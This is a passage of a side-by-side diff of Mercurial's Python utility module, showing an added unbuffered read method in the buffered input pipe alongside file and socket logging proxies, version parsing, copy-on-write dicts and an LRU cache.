306 306 This will be used externally a pre-step for polling IO. If there is
307 307 already data then no polling should be set in place."""
308 308 return bool(self._buffer)
309 309
310 310 @property
311 311 def closed(self):
312 312 return self._input.closed
313 313
314 314 def fileno(self):
315 315 return self._input.fileno()
316 316
317 317 def close(self):
318 318 return self._input.close()
319 319
320 320 def read(self, size):
321 321 while (not self._eof) and (self._lenbuf < size):
322 322 self._fillbuffer()
323 323 return self._frombuffer(size)
324 324
325 def unbufferedread(self, size):
326 if not self._eof and self._lenbuf == 0:
327 self._fillbuffer(max(size, _chunksize))
328 return self._frombuffer(min(self._lenbuf, size))
329
325 330 def readline(self, *args, **kwargs):
326 331 if 1 < len(self._buffer):
327 332 # this should not happen because both read and readline end with a
328 333 # _frombuffer call that collapse it.
329 334 self._buffer = [''.join(self._buffer)]
330 335 self._lenbuf = len(self._buffer[0])
331 336 lfi = -1
332 337 if self._buffer:
333 338 lfi = self._buffer[-1].find('\n')
334 339 while (not self._eof) and lfi < 0:
335 340 self._fillbuffer()
336 341 if self._buffer:
337 342 lfi = self._buffer[-1].find('\n')
338 343 size = lfi + 1
339 344 if lfi < 0: # end of file
340 345 size = self._lenbuf
341 346 elif 1 < len(self._buffer):
342 347 # we need to take previous chunks into account
343 348 size += self._lenbuf - len(self._buffer[-1])
344 349 return self._frombuffer(size)
345 350
346 351 def _frombuffer(self, size):
347 352 """return at most 'size' data from the buffer
348 353
349 354 The data are removed from the buffer."""
350 355 if size == 0 or not self._buffer:
351 356 return ''
352 357 buf = self._buffer[0]
353 358 if 1 < len(self._buffer):
354 359 buf = ''.join(self._buffer)
355 360
356 361 data = buf[:size]
357 362 buf = buf[len(data):]
358 363 if buf:
359 364 self._buffer = [buf]
360 365 self._lenbuf = len(buf)
361 366 else:
362 367 self._buffer = []
363 368 self._lenbuf = 0
364 369 return data
365 370
366 def _fillbuffer(self):
371 def _fillbuffer(self, size=_chunksize):
367 372 """read data to the buffer"""
368 data = os.read(self._input.fileno(), _chunksize)
373 data = os.read(self._input.fileno(), size)
369 374 if not data:
370 375 self._eof = True
371 376 else:
372 377 self._lenbuf += len(data)
373 378 self._buffer.append(data)
374 379
375 380 return data
376 381
377 382 def mmapread(fp):
378 383 try:
379 384 fd = getattr(fp, 'fileno', lambda: fp)()
380 385 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
381 386 except ValueError:
382 387 # Empty files cannot be mmapped, but mmapread should still work. Check
383 388 # if the file is empty, and if so, return an empty buffer.
384 389 if os.fstat(fd).st_size == 0:
385 390 return ''
386 391 raise
387 392
388 393 class fileobjectproxy(object):
389 394 """A proxy around file objects that tells a watcher when events occur.
390 395
391 396 This type is intended to only be used for testing purposes. Think hard
392 397 before using it in important code.
393 398 """
394 399 __slots__ = (
395 400 r'_orig',
396 401 r'_observer',
397 402 )
398 403
399 404 def __init__(self, fh, observer):
400 405 object.__setattr__(self, r'_orig', fh)
401 406 object.__setattr__(self, r'_observer', observer)
402 407
403 408 def __getattribute__(self, name):
404 409 ours = {
405 410 r'_observer',
406 411
407 412 # IOBase
408 413 r'close',
409 414 # closed if a property
410 415 r'fileno',
411 416 r'flush',
412 417 r'isatty',
413 418 r'readable',
414 419 r'readline',
415 420 r'readlines',
416 421 r'seek',
417 422 r'seekable',
418 423 r'tell',
419 424 r'truncate',
420 425 r'writable',
421 426 r'writelines',
422 427 # RawIOBase
423 428 r'read',
424 429 r'readall',
425 430 r'readinto',
426 431 r'write',
427 432 # BufferedIOBase
428 433 # raw is a property
429 434 r'detach',
430 435 # read defined above
431 436 r'read1',
432 437 # readinto defined above
433 438 # write defined above
434 439 }
435 440
436 441 # We only observe some methods.
437 442 if name in ours:
438 443 return object.__getattribute__(self, name)
439 444
440 445 return getattr(object.__getattribute__(self, r'_orig'), name)
441 446
442 447 def __nonzero__(self):
443 448 return bool(object.__getattribute__(self, r'_orig'))
444 449
445 450 __bool__ = __nonzero__
446 451
447 452 def __delattr__(self, name):
448 453 return delattr(object.__getattribute__(self, r'_orig'), name)
449 454
450 455 def __setattr__(self, name, value):
451 456 return setattr(object.__getattribute__(self, r'_orig'), name, value)
452 457
453 458 def __iter__(self):
454 459 return object.__getattribute__(self, r'_orig').__iter__()
455 460
456 461 def _observedcall(self, name, *args, **kwargs):
457 462 # Call the original object.
458 463 orig = object.__getattribute__(self, r'_orig')
459 464 res = getattr(orig, name)(*args, **kwargs)
460 465
461 466 # Call a method on the observer of the same name with arguments
462 467 # so it can react, log, etc.
463 468 observer = object.__getattribute__(self, r'_observer')
464 469 fn = getattr(observer, name, None)
465 470 if fn:
466 471 fn(res, *args, **kwargs)
467 472
468 473 return res
469 474
470 475 def close(self, *args, **kwargs):
471 476 return object.__getattribute__(self, r'_observedcall')(
472 477 r'close', *args, **kwargs)
473 478
474 479 def fileno(self, *args, **kwargs):
475 480 return object.__getattribute__(self, r'_observedcall')(
476 481 r'fileno', *args, **kwargs)
477 482
478 483 def flush(self, *args, **kwargs):
479 484 return object.__getattribute__(self, r'_observedcall')(
480 485 r'flush', *args, **kwargs)
481 486
482 487 def isatty(self, *args, **kwargs):
483 488 return object.__getattribute__(self, r'_observedcall')(
484 489 r'isatty', *args, **kwargs)
485 490
486 491 def readable(self, *args, **kwargs):
487 492 return object.__getattribute__(self, r'_observedcall')(
488 493 r'readable', *args, **kwargs)
489 494
490 495 def readline(self, *args, **kwargs):
491 496 return object.__getattribute__(self, r'_observedcall')(
492 497 r'readline', *args, **kwargs)
493 498
494 499 def readlines(self, *args, **kwargs):
495 500 return object.__getattribute__(self, r'_observedcall')(
496 501 r'readlines', *args, **kwargs)
497 502
498 503 def seek(self, *args, **kwargs):
499 504 return object.__getattribute__(self, r'_observedcall')(
500 505 r'seek', *args, **kwargs)
501 506
502 507 def seekable(self, *args, **kwargs):
503 508 return object.__getattribute__(self, r'_observedcall')(
504 509 r'seekable', *args, **kwargs)
505 510
506 511 def tell(self, *args, **kwargs):
507 512 return object.__getattribute__(self, r'_observedcall')(
508 513 r'tell', *args, **kwargs)
509 514
510 515 def truncate(self, *args, **kwargs):
511 516 return object.__getattribute__(self, r'_observedcall')(
512 517 r'truncate', *args, **kwargs)
513 518
514 519 def writable(self, *args, **kwargs):
515 520 return object.__getattribute__(self, r'_observedcall')(
516 521 r'writable', *args, **kwargs)
517 522
518 523 def writelines(self, *args, **kwargs):
519 524 return object.__getattribute__(self, r'_observedcall')(
520 525 r'writelines', *args, **kwargs)
521 526
522 527 def read(self, *args, **kwargs):
523 528 return object.__getattribute__(self, r'_observedcall')(
524 529 r'read', *args, **kwargs)
525 530
526 531 def readall(self, *args, **kwargs):
527 532 return object.__getattribute__(self, r'_observedcall')(
528 533 r'readall', *args, **kwargs)
529 534
530 535 def readinto(self, *args, **kwargs):
531 536 return object.__getattribute__(self, r'_observedcall')(
532 537 r'readinto', *args, **kwargs)
533 538
534 539 def write(self, *args, **kwargs):
535 540 return object.__getattribute__(self, r'_observedcall')(
536 541 r'write', *args, **kwargs)
537 542
538 543 def detach(self, *args, **kwargs):
539 544 return object.__getattribute__(self, r'_observedcall')(
540 545 r'detach', *args, **kwargs)
541 546
542 547 def read1(self, *args, **kwargs):
543 548 return object.__getattribute__(self, r'_observedcall')(
544 549 r'read1', *args, **kwargs)
545 550
546 551 class observedbufferedinputpipe(bufferedinputpipe):
547 552 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
548 553
549 554 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
550 555 bypass ``fileobjectproxy``. Because of this, we need to make
551 556 ``bufferedinputpipe`` aware of these operations.
552 557
553 558 This variation of ``bufferedinputpipe`` can notify observers about
554 559 ``os.read()`` events. It also re-publishes other events, such as
555 560 ``read()`` and ``readline()``.
556 561 """
557 562 def _fillbuffer(self):
558 563 res = super(observedbufferedinputpipe, self)._fillbuffer()
559 564
560 565 fn = getattr(self._input._observer, r'osread', None)
561 566 if fn:
562 567 fn(res, _chunksize)
563 568
564 569 return res
565 570
566 571 # We use different observer methods because the operation isn't
567 572 # performed on the actual file object but on us.
568 573 def read(self, size):
569 574 res = super(observedbufferedinputpipe, self).read(size)
570 575
571 576 fn = getattr(self._input._observer, r'bufferedread', None)
572 577 if fn:
573 578 fn(res, size)
574 579
575 580 return res
576 581
577 582 def readline(self, *args, **kwargs):
578 583 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
579 584
580 585 fn = getattr(self._input._observer, r'bufferedreadline', None)
581 586 if fn:
582 587 fn(res)
583 588
584 589 return res
585 590
586 591 PROXIED_SOCKET_METHODS = {
587 592 r'makefile',
588 593 r'recv',
589 594 r'recvfrom',
590 595 r'recvfrom_into',
591 596 r'recv_into',
592 597 r'send',
593 598 r'sendall',
594 599 r'sendto',
595 600 r'setblocking',
596 601 r'settimeout',
597 602 r'gettimeout',
598 603 r'setsockopt',
599 604 }
600 605
601 606 class socketproxy(object):
602 607 """A proxy around a socket that tells a watcher when events occur.
603 608
604 609 This is like ``fileobjectproxy`` except for sockets.
605 610
606 611 This type is intended to only be used for testing purposes. Think hard
607 612 before using it in important code.
608 613 """
609 614 __slots__ = (
610 615 r'_orig',
611 616 r'_observer',
612 617 )
613 618
614 619 def __init__(self, sock, observer):
615 620 object.__setattr__(self, r'_orig', sock)
616 621 object.__setattr__(self, r'_observer', observer)
617 622
618 623 def __getattribute__(self, name):
619 624 if name in PROXIED_SOCKET_METHODS:
620 625 return object.__getattribute__(self, name)
621 626
622 627 return getattr(object.__getattribute__(self, r'_orig'), name)
623 628
624 629 def __delattr__(self, name):
625 630 return delattr(object.__getattribute__(self, r'_orig'), name)
626 631
627 632 def __setattr__(self, name, value):
628 633 return setattr(object.__getattribute__(self, r'_orig'), name, value)
629 634
630 635 def __nonzero__(self):
631 636 return bool(object.__getattribute__(self, r'_orig'))
632 637
633 638 __bool__ = __nonzero__
634 639
635 640 def _observedcall(self, name, *args, **kwargs):
636 641 # Call the original object.
637 642 orig = object.__getattribute__(self, r'_orig')
638 643 res = getattr(orig, name)(*args, **kwargs)
639 644
640 645 # Call a method on the observer of the same name with arguments
641 646 # so it can react, log, etc.
642 647 observer = object.__getattribute__(self, r'_observer')
643 648 fn = getattr(observer, name, None)
644 649 if fn:
645 650 fn(res, *args, **kwargs)
646 651
647 652 return res
648 653
649 654 def makefile(self, *args, **kwargs):
650 655 res = object.__getattribute__(self, r'_observedcall')(
651 656 r'makefile', *args, **kwargs)
652 657
653 658 # The file object may be used for I/O. So we turn it into a
654 659 # proxy using our observer.
655 660 observer = object.__getattribute__(self, r'_observer')
656 661 return makeloggingfileobject(observer.fh, res, observer.name,
657 662 reads=observer.reads,
658 663 writes=observer.writes,
659 664 logdata=observer.logdata,
660 665 logdataapis=observer.logdataapis)
661 666
662 667 def recv(self, *args, **kwargs):
663 668 return object.__getattribute__(self, r'_observedcall')(
664 669 r'recv', *args, **kwargs)
665 670
666 671 def recvfrom(self, *args, **kwargs):
667 672 return object.__getattribute__(self, r'_observedcall')(
668 673 r'recvfrom', *args, **kwargs)
669 674
670 675 def recvfrom_into(self, *args, **kwargs):
671 676 return object.__getattribute__(self, r'_observedcall')(
672 677 r'recvfrom_into', *args, **kwargs)
673 678
674 679 def recv_into(self, *args, **kwargs):
675 680 return object.__getattribute__(self, r'_observedcall')(
676 681 r'recv_info', *args, **kwargs)
677 682
678 683 def send(self, *args, **kwargs):
679 684 return object.__getattribute__(self, r'_observedcall')(
680 685 r'send', *args, **kwargs)
681 686
682 687 def sendall(self, *args, **kwargs):
683 688 return object.__getattribute__(self, r'_observedcall')(
684 689 r'sendall', *args, **kwargs)
685 690
686 691 def sendto(self, *args, **kwargs):
687 692 return object.__getattribute__(self, r'_observedcall')(
688 693 r'sendto', *args, **kwargs)
689 694
690 695 def setblocking(self, *args, **kwargs):
691 696 return object.__getattribute__(self, r'_observedcall')(
692 697 r'setblocking', *args, **kwargs)
693 698
694 699 def settimeout(self, *args, **kwargs):
695 700 return object.__getattribute__(self, r'_observedcall')(
696 701 r'settimeout', *args, **kwargs)
697 702
698 703 def gettimeout(self, *args, **kwargs):
699 704 return object.__getattribute__(self, r'_observedcall')(
700 705 r'gettimeout', *args, **kwargs)
701 706
702 707 def setsockopt(self, *args, **kwargs):
703 708 return object.__getattribute__(self, r'_observedcall')(
704 709 r'setsockopt', *args, **kwargs)
705 710
706 711 class baseproxyobserver(object):
707 712 def _writedata(self, data):
708 713 if not self.logdata:
709 714 if self.logdataapis:
710 715 self.fh.write('\n')
711 716 self.fh.flush()
712 717 return
713 718
714 719 # Simple case writes all data on a single line.
715 720 if b'\n' not in data:
716 721 if self.logdataapis:
717 722 self.fh.write(': %s\n' % stringutil.escapestr(data))
718 723 else:
719 724 self.fh.write('%s> %s\n'
720 725 % (self.name, stringutil.escapestr(data)))
721 726 self.fh.flush()
722 727 return
723 728
724 729 # Data with newlines is written to multiple lines.
725 730 if self.logdataapis:
726 731 self.fh.write(':\n')
727 732
728 733 lines = data.splitlines(True)
729 734 for line in lines:
730 735 self.fh.write('%s> %s\n'
731 736 % (self.name, stringutil.escapestr(line)))
732 737 self.fh.flush()
733 738
734 739 class fileobjectobserver(baseproxyobserver):
735 740 """Logs file object activity."""
736 741 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
737 742 logdataapis=True):
738 743 self.fh = fh
739 744 self.name = name
740 745 self.logdata = logdata
741 746 self.logdataapis = logdataapis
742 747 self.reads = reads
743 748 self.writes = writes
744 749
745 750 def read(self, res, size=-1):
746 751 if not self.reads:
747 752 return
748 753 # Python 3 can return None from reads at EOF instead of empty strings.
749 754 if res is None:
750 755 res = ''
751 756
752 757 if size == -1 and res == '':
753 758 # Suppress pointless read(-1) calls that return
754 759 # nothing. These happen _a lot_ on Python 3, and there
755 760 # doesn't seem to be a better workaround to have matching
756 761 # Python 2 and 3 behavior. :(
757 762 return
758 763
759 764 if self.logdataapis:
760 765 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
761 766
762 767 self._writedata(res)
763 768
764 769 def readline(self, res, limit=-1):
765 770 if not self.reads:
766 771 return
767 772
768 773 if self.logdataapis:
769 774 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
770 775
771 776 self._writedata(res)
772 777
773 778 def readinto(self, res, dest):
774 779 if not self.reads:
775 780 return
776 781
777 782 if self.logdataapis:
778 783 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
779 784 res))
780 785
781 786 data = dest[0:res] if res is not None else b''
782 787 self._writedata(data)
783 788
784 789 def write(self, res, data):
785 790 if not self.writes:
786 791 return
787 792
788 793 # Python 2 returns None from some write() calls. Python 3 (reasonably)
789 794 # returns the integer bytes written.
790 795 if res is None and data:
791 796 res = len(data)
792 797
793 798 if self.logdataapis:
794 799 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
795 800
796 801 self._writedata(data)
797 802
798 803 def flush(self, res):
799 804 if not self.writes:
800 805 return
801 806
802 807 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
803 808
804 809 # For observedbufferedinputpipe.
805 810 def bufferedread(self, res, size):
806 811 if not self.reads:
807 812 return
808 813
809 814 if self.logdataapis:
810 815 self.fh.write('%s> bufferedread(%d) -> %d' % (
811 816 self.name, size, len(res)))
812 817
813 818 self._writedata(res)
814 819
815 820 def bufferedreadline(self, res):
816 821 if not self.reads:
817 822 return
818 823
819 824 if self.logdataapis:
820 825 self.fh.write('%s> bufferedreadline() -> %d' % (
821 826 self.name, len(res)))
822 827
823 828 self._writedata(res)
824 829
825 830 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
826 831 logdata=False, logdataapis=True):
827 832 """Turn a file object into a logging file object."""
828 833
829 834 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
830 835 logdata=logdata, logdataapis=logdataapis)
831 836 return fileobjectproxy(fh, observer)
832 837
833 838 class socketobserver(baseproxyobserver):
834 839 """Logs socket activity."""
835 840 def __init__(self, fh, name, reads=True, writes=True, states=True,
836 841 logdata=False, logdataapis=True):
837 842 self.fh = fh
838 843 self.name = name
839 844 self.reads = reads
840 845 self.writes = writes
841 846 self.states = states
842 847 self.logdata = logdata
843 848 self.logdataapis = logdataapis
844 849
845 850 def makefile(self, res, mode=None, bufsize=None):
846 851 if not self.states:
847 852 return
848 853
849 854 self.fh.write('%s> makefile(%r, %r)\n' % (
850 855 self.name, mode, bufsize))
851 856
852 857 def recv(self, res, size, flags=0):
853 858 if not self.reads:
854 859 return
855 860
856 861 if self.logdataapis:
857 862 self.fh.write('%s> recv(%d, %d) -> %d' % (
858 863 self.name, size, flags, len(res)))
859 864 self._writedata(res)
860 865
861 866 def recvfrom(self, res, size, flags=0):
862 867 if not self.reads:
863 868 return
864 869
865 870 if self.logdataapis:
866 871 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
867 872 self.name, size, flags, len(res[0])))
868 873
869 874 self._writedata(res[0])
870 875
871 876 def recvfrom_into(self, res, buf, size, flags=0):
872 877 if not self.reads:
873 878 return
874 879
875 880 if self.logdataapis:
876 881 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
877 882 self.name, size, flags, res[0]))
878 883
879 884 self._writedata(buf[0:res[0]])
880 885
881 886 def recv_into(self, res, buf, size=0, flags=0):
882 887 if not self.reads:
883 888 return
884 889
885 890 if self.logdataapis:
886 891 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
887 892 self.name, size, flags, res))
888 893
889 894 self._writedata(buf[0:res])
890 895
891 896 def send(self, res, data, flags=0):
892 897 if not self.writes:
893 898 return
894 899
895 900 self.fh.write('%s> send(%d, %d) -> %d' % (
896 901 self.name, len(data), flags, len(res)))
897 902 self._writedata(data)
898 903
899 904 def sendall(self, res, data, flags=0):
900 905 if not self.writes:
901 906 return
902 907
903 908 if self.logdataapis:
904 909 # Returns None on success. So don't bother reporting return value.
905 910 self.fh.write('%s> sendall(%d, %d)' % (
906 911 self.name, len(data), flags))
907 912
908 913 self._writedata(data)
909 914
910 915 def sendto(self, res, data, flagsoraddress, address=None):
911 916 if not self.writes:
912 917 return
913 918
914 919 if address:
915 920 flags = flagsoraddress
916 921 else:
917 922 flags = 0
918 923
919 924 if self.logdataapis:
920 925 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
921 926 self.name, len(data), flags, address, res))
922 927
923 928 self._writedata(data)
924 929
925 930 def setblocking(self, res, flag):
926 931 if not self.states:
927 932 return
928 933
929 934 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
930 935
931 936 def settimeout(self, res, value):
932 937 if not self.states:
933 938 return
934 939
935 940 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
936 941
937 942 def gettimeout(self, res):
938 943 if not self.states:
939 944 return
940 945
941 946 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
942 947
943 948 def setsockopt(self, level, optname, value):
944 949 if not self.states:
945 950 return
946 951
947 952 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
948 953 self.name, level, optname, value))
949 954
950 955 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
951 956 logdata=False, logdataapis=True):
952 957 """Turn a socket into a logging socket."""
953 958
954 959 observer = socketobserver(logh, name, reads=reads, writes=writes,
955 960 states=states, logdata=logdata,
956 961 logdataapis=logdataapis)
957 962 return socketproxy(fh, observer)
958 963
959 964 def version():
960 965 """Return version information if available."""
961 966 try:
962 967 from . import __version__
963 968 return __version__.version
964 969 except ImportError:
965 970 return 'unknown'
966 971
967 972 def versiontuple(v=None, n=4):
968 973 """Parses a Mercurial version string into an N-tuple.
969 974
970 975 The version string to be parsed is specified with the ``v`` argument.
971 976 If it isn't defined, the current Mercurial version string will be parsed.
972 977
973 978 ``n`` can be 2, 3, or 4. Here is how some version strings map to
974 979 returned values:
975 980
976 981 >>> v = b'3.6.1+190-df9b73d2d444'
977 982 >>> versiontuple(v, 2)
978 983 (3, 6)
979 984 >>> versiontuple(v, 3)
980 985 (3, 6, 1)
981 986 >>> versiontuple(v, 4)
982 987 (3, 6, 1, '190-df9b73d2d444')
983 988
984 989 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
985 990 (3, 6, 1, '190-df9b73d2d444+20151118')
986 991
987 992 >>> v = b'3.6'
988 993 >>> versiontuple(v, 2)
989 994 (3, 6)
990 995 >>> versiontuple(v, 3)
991 996 (3, 6, None)
992 997 >>> versiontuple(v, 4)
993 998 (3, 6, None, None)
994 999
995 1000 >>> v = b'3.9-rc'
996 1001 >>> versiontuple(v, 2)
997 1002 (3, 9)
998 1003 >>> versiontuple(v, 3)
999 1004 (3, 9, None)
1000 1005 >>> versiontuple(v, 4)
1001 1006 (3, 9, None, 'rc')
1002 1007
1003 1008 >>> v = b'3.9-rc+2-02a8fea4289b'
1004 1009 >>> versiontuple(v, 2)
1005 1010 (3, 9)
1006 1011 >>> versiontuple(v, 3)
1007 1012 (3, 9, None)
1008 1013 >>> versiontuple(v, 4)
1009 1014 (3, 9, None, 'rc+2-02a8fea4289b')
1010 1015
1011 1016 >>> versiontuple(b'4.6rc0')
1012 1017 (4, 6, None, 'rc0')
1013 1018 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1014 1019 (4, 6, None, 'rc0+12-425d55e54f98')
1015 1020 >>> versiontuple(b'.1.2.3')
1016 1021 (None, None, None, '.1.2.3')
1017 1022 >>> versiontuple(b'12.34..5')
1018 1023 (12, 34, None, '..5')
1019 1024 >>> versiontuple(b'1.2.3.4.5.6')
1020 1025 (1, 2, 3, '.4.5.6')
1021 1026 """
1022 1027 if not v:
1023 1028 v = version()
1024 1029 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1025 1030 if not m:
1026 1031 vparts, extra = '', v
1027 1032 elif m.group(2):
1028 1033 vparts, extra = m.groups()
1029 1034 else:
1030 1035 vparts, extra = m.group(1), None
1031 1036
1032 1037 vints = []
1033 1038 for i in vparts.split('.'):
1034 1039 try:
1035 1040 vints.append(int(i))
1036 1041 except ValueError:
1037 1042 break
1038 1043 # (3, 6) -> (3, 6, None)
1039 1044 while len(vints) < 3:
1040 1045 vints.append(None)
1041 1046
1042 1047 if n == 2:
1043 1048 return (vints[0], vints[1])
1044 1049 if n == 3:
1045 1050 return (vints[0], vints[1], vints[2])
1046 1051 if n == 4:
1047 1052 return (vints[0], vints[1], vints[2], extra)
1048 1053
1049 1054 def cachefunc(func):
1050 1055 '''cache the result of function calls'''
1051 1056 # XXX doesn't handle keywords args
1052 1057 if func.__code__.co_argcount == 0:
1053 1058 cache = []
1054 1059 def f():
1055 1060 if len(cache) == 0:
1056 1061 cache.append(func())
1057 1062 return cache[0]
1058 1063 return f
1059 1064 cache = {}
1060 1065 if func.__code__.co_argcount == 1:
1061 1066 # we gain a small amount of time because
1062 1067 # we don't need to pack/unpack the list
1063 1068 def f(arg):
1064 1069 if arg not in cache:
1065 1070 cache[arg] = func(arg)
1066 1071 return cache[arg]
1067 1072 else:
1068 1073 def f(*args):
1069 1074 if args not in cache:
1070 1075 cache[args] = func(*args)
1071 1076 return cache[args]
1072 1077
1073 1078 return f
1074 1079
1075 1080 class cow(object):
1076 1081 """helper class to make copy-on-write easier
1077 1082
1078 1083 Call preparewrite before doing any writes.
1079 1084 """
1080 1085
1081 1086 def preparewrite(self):
1082 1087 """call this before writes, return self or a copied new object"""
1083 1088 if getattr(self, '_copied', 0):
1084 1089 self._copied -= 1
1085 1090 return self.__class__(self)
1086 1091 return self
1087 1092
1088 1093 def copy(self):
1089 1094 """always do a cheap copy"""
1090 1095 self._copied = getattr(self, '_copied', 0) + 1
1091 1096 return self
1092 1097
1093 1098 class sortdict(collections.OrderedDict):
1094 1099 '''a simple sorted dictionary
1095 1100
1096 1101 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1097 1102 >>> d2 = d1.copy()
1098 1103 >>> d2
1099 1104 sortdict([('a', 0), ('b', 1)])
1100 1105 >>> d2.update([(b'a', 2)])
1101 1106 >>> list(d2.keys()) # should still be in last-set order
1102 1107 ['b', 'a']
1103 1108 '''
1104 1109
1105 1110 def __setitem__(self, key, value):
1106 1111 if key in self:
1107 1112 del self[key]
1108 1113 super(sortdict, self).__setitem__(key, value)
1109 1114
1110 1115 if pycompat.ispypy:
1111 1116 # __setitem__() isn't called as of PyPy 5.8.0
1112 1117 def update(self, src):
1113 1118 if isinstance(src, dict):
1114 1119 src = src.iteritems()
1115 1120 for k, v in src:
1116 1121 self[k] = v
1117 1122
1118 1123 class cowdict(cow, dict):
1119 1124 """copy-on-write dict
1120 1125
1121 1126 Be sure to call d = d.preparewrite() before writing to d.
1122 1127
1123 1128 >>> a = cowdict()
1124 1129 >>> a is a.preparewrite()
1125 1130 True
1126 1131 >>> b = a.copy()
1127 1132 >>> b is a
1128 1133 True
1129 1134 >>> c = b.copy()
1130 1135 >>> c is a
1131 1136 True
1132 1137 >>> a = a.preparewrite()
1133 1138 >>> b is a
1134 1139 False
1135 1140 >>> a is a.preparewrite()
1136 1141 True
1137 1142 >>> c = c.preparewrite()
1138 1143 >>> b is c
1139 1144 False
1140 1145 >>> b is b.preparewrite()
1141 1146 True
1142 1147 """
1143 1148
1144 1149 class cowsortdict(cow, sortdict):
1145 1150 """copy-on-write sortdict
1146 1151
1147 1152 Be sure to call d = d.preparewrite() before writing to d.
1148 1153 """
1149 1154
1150 1155 class transactional(object):
1151 1156 """Base class for making a transactional type into a context manager."""
1152 1157 __metaclass__ = abc.ABCMeta
1153 1158
1154 1159 @abc.abstractmethod
1155 1160 def close(self):
1156 1161 """Successfully closes the transaction."""
1157 1162
1158 1163 @abc.abstractmethod
1159 1164 def release(self):
1160 1165 """Marks the end of the transaction.
1161 1166
1162 1167 If the transaction has not been closed, it will be aborted.
1163 1168 """
1164 1169
1165 1170 def __enter__(self):
1166 1171 return self
1167 1172
1168 1173 def __exit__(self, exc_type, exc_val, exc_tb):
1169 1174 try:
1170 1175 if exc_type is None:
1171 1176 self.close()
1172 1177 finally:
1173 1178 self.release()
1174 1179
1175 1180 @contextlib.contextmanager
1176 1181 def acceptintervention(tr=None):
1177 1182 """A context manager that closes the transaction on InterventionRequired
1178 1183
1179 1184 If no transaction was provided, this simply runs the body and returns
1180 1185 """
1181 1186 if not tr:
1182 1187 yield
1183 1188 return
1184 1189 try:
1185 1190 yield
1186 1191 tr.close()
1187 1192 except error.InterventionRequired:
1188 1193 tr.close()
1189 1194 raise
1190 1195 finally:
1191 1196 tr.release()
1192 1197
1193 1198 @contextlib.contextmanager
1194 1199 def nullcontextmanager():
1195 1200 yield
1196 1201
1197 1202 class _lrucachenode(object):
1198 1203 """A node in a doubly linked list.
1199 1204
1200 1205 Holds a reference to nodes on either side as well as a key-value
1201 1206 pair for the dictionary entry.
1202 1207 """
1203 1208 __slots__ = (u'next', u'prev', u'key', u'value')
1204 1209
1205 1210 def __init__(self):
1206 1211 self.next = None
1207 1212 self.prev = None
1208 1213
1209 1214 self.key = _notset
1210 1215 self.value = None
1211 1216
1212 1217 def markempty(self):
1213 1218 """Mark the node as emptied."""
1214 1219 self.key = _notset
1215 1220
1216 1221 class lrucachedict(object):
1217 1222 """Dict that caches most recent accesses and sets.
1218 1223
1219 1224 The dict consists of an actual backing dict - indexed by original
1220 1225 key - and a doubly linked circular list defining the order of entries in
1221 1226 the cache.
1222 1227
1223 1228 The head node is the newest entry in the cache. If the cache is full,
1224 1229 we recycle head.prev and make it the new head. Cache accesses result in
1225 1230 the node being moved to before the existing head and being marked as the
1226 1231 new head node.
1227 1232 """
1228 1233 def __init__(self, max):
1229 1234 self._cache = {}
1230 1235
1231 1236 self._head = head = _lrucachenode()
1232 1237 head.prev = head
1233 1238 head.next = head
1234 1239 self._size = 1
1235 1240 self._capacity = max
1236 1241
1237 1242 def __len__(self):
1238 1243 return len(self._cache)
1239 1244
1240 1245 def __contains__(self, k):
1241 1246 return k in self._cache
1242 1247
1243 1248 def __iter__(self):
1244 1249 # We don't have to iterate in cache order, but why not.
1245 1250 n = self._head
1246 1251 for i in range(len(self._cache)):
1247 1252 yield n.key
1248 1253 n = n.next
1249 1254
1250 1255 def __getitem__(self, k):
1251 1256 node = self._cache[k]
1252 1257 self._movetohead(node)
1253 1258 return node.value
1254 1259
1255 1260 def __setitem__(self, k, v):
1256 1261 node = self._cache.get(k)
1257 1262 # Replace existing value and mark as newest.
1258 1263 if node is not None:
1259 1264 node.value = v
1260 1265 self._movetohead(node)
1261 1266 return
1262 1267
1263 1268 if self._size < self._capacity:
1264 1269 node = self._addcapacity()
1265 1270 else:
1266 1271 # Grab the last/oldest item.
1267 1272 node = self._head.prev
1268 1273
1269 1274 # At capacity. Kill the old entry.
1270 1275 if node.key is not _notset:
1271 1276 del self._cache[node.key]
1272 1277
1273 1278 node.key = k
1274 1279 node.value = v
1275 1280 self._cache[k] = node
1276 1281 # And mark it as newest entry. No need to adjust order since it
1277 1282 # is already self._head.prev.
1278 1283 self._head = node
1279 1284
1280 1285 def __delitem__(self, k):
1281 1286 node = self._cache.pop(k)
1282 1287 node.markempty()
1283 1288
1284 1289 # Temporarily mark as newest item before re-adjusting head to make
1285 1290 # this node the oldest item.
1286 1291 self._movetohead(node)
1287 1292 self._head = node.next
1288 1293
1289 1294 # Additional dict methods.
1290 1295
1291 1296 def get(self, k, default=None):
1292 1297 try:
1293 1298 return self._cache[k].value
1294 1299 except KeyError:
1295 1300 return default
1296 1301
1297 1302 def clear(self):
1298 1303 n = self._head
1299 1304 while n.key is not _notset:
1300 1305 n.markempty()
1301 1306 n = n.next
1302 1307
1303 1308 self._cache.clear()
1304 1309
1305 1310 def copy(self):
1306 1311 result = lrucachedict(self._capacity)
1307 1312 n = self._head.prev
